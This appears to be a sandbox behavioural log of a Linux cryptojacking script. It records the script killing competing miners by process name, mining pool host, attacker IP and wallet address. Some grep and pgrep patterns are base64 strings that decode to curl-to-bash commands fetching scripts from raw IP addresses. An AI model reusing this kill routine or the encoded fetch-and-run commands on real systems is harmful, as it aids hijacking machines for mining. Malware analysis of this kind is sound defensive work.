/bin/grepgrep ksoftirqds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netdns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchdogs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v atd2⤵
-
-
/bin/grepgrep -v dblaunchs2⤵
-
-
/bin/grepgrep -v dblaunch2⤵
-
-
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v root2⤵
-
-
/bin/grepgrep -v salt-minions2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -v dblaunched2⤵
-
-
/bin/grepgrep -v apache22⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " ps"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep sync_supers2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/cutcut -c 9-152⤵
-
-
/bin/grepgrep cpuset2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "x]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "sh] <"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep " \\[]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/l.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/zmcat2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CnzFVPLF2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep CvKzzZLs2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/udevd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sustse32⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep 2mr.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep cr5.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep logo9.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep j2.conf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep luk-cpu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep ficov2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep he.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep miner.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep wget2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep curl2⤵
-
-
/bin/grepgrep nullcrew2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1562⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 83.220.169.2472⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.203.1462⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 144.217.45.452⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 107.174.47.1812⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep mine.moneropool.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep pool.t00ls.ru2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:80802⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grep
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep monerohash.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep /tmp/a7b104c2702⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:66662⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
-
-
/bin/grepgrep xmr.crypto-pool.fr:77772⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmr.crypto-pool.fr:4432⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep stratum.f2pool.com:88882⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xmrpool.eu2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps auxf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 16303⤵
-
-
/usr/local/bin/killkill -9 16303⤵
-
-
/usr/sbin/killkill -9 16303⤵
-
-
/usr/bin/killkill -9 16303⤵
-
-
/sbin/killkill -9 16303⤵
-
-
/bin/killkill -9 16303⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep xiaoyao2⤵
-
-
/bin/psps auxf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/local/sbin/killkill -9 16353⤵
-
-
/usr/local/bin/killkill -9 16353⤵
-
-
/usr/sbin/killkill -9 16353⤵
-
-
/usr/bin/killkill -9 16353⤵
-
-
/sbin/killkill -9 16353⤵
-
-
/bin/killkill -9 16353⤵
- Reads CPU attributes
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps auxf2⤵
-
-
/bin/grepgrep xiaoxue2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep 46.243.253.152⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 176.31.6.162⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 108.174.197.762⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 192.236.161.62⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep "ESTABLISHED\\|SYN_SENT"2⤵
-
-
/bin/grepgrep 88.99.242.922⤵
-
-
/usr/bin/pkillpkill -f pastebin2⤵
-
-
/usr/bin/pkillpkill -f 185.193.127.1152⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f monerohash2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f L2Jpbi9iYXN2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f xzpauectgr2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f slxfbkmxtd2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f mixtape2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f addnj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 200.68.17.1962⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f IyEvYmluL3NoCgpzUG2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f KHdnZXQgLXFPLSBodHRw2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS32⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f mwyumwdbpq.conf2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f honvbsasbf.conf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f mqdsflm.cf2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f stratum2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f lower.sh2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./ppp2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f cryptonight2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./seervceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceaess2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servceas2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./servcesa2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./vsp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./jvs2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./pvv2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./vpp2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./pces2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./rspce2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./haveged2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./jiba2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f ./watchbog2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ./A7mA5gb2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kacpi_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kswap_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kauditd_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kpsmoused_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f kseriod_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kthreadd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ksoftirqd_svc2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kintegrityd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f jawa2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f oracle.jpg2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 188.209.49.542⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 181.214.87.2412⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f servim2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f kblockd_svc2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f native_svc2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f ynn2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f 65ccEJ72⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f jmxx2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f 2Ne80nA2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/pgreppgrep -f sysstats2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f systemxlv2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f watchbog2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/pgreppgrep -f OIcJi1m2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f biosetjenkins2⤵
-
-
/usr/bin/pkillpkill -f Loopback2⤵
-
-
/usr/bin/pkillpkill -f apaceha2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f stratum2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f mixnerdx2⤵
-
-
/usr/bin/pkillpkill -f performedl2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
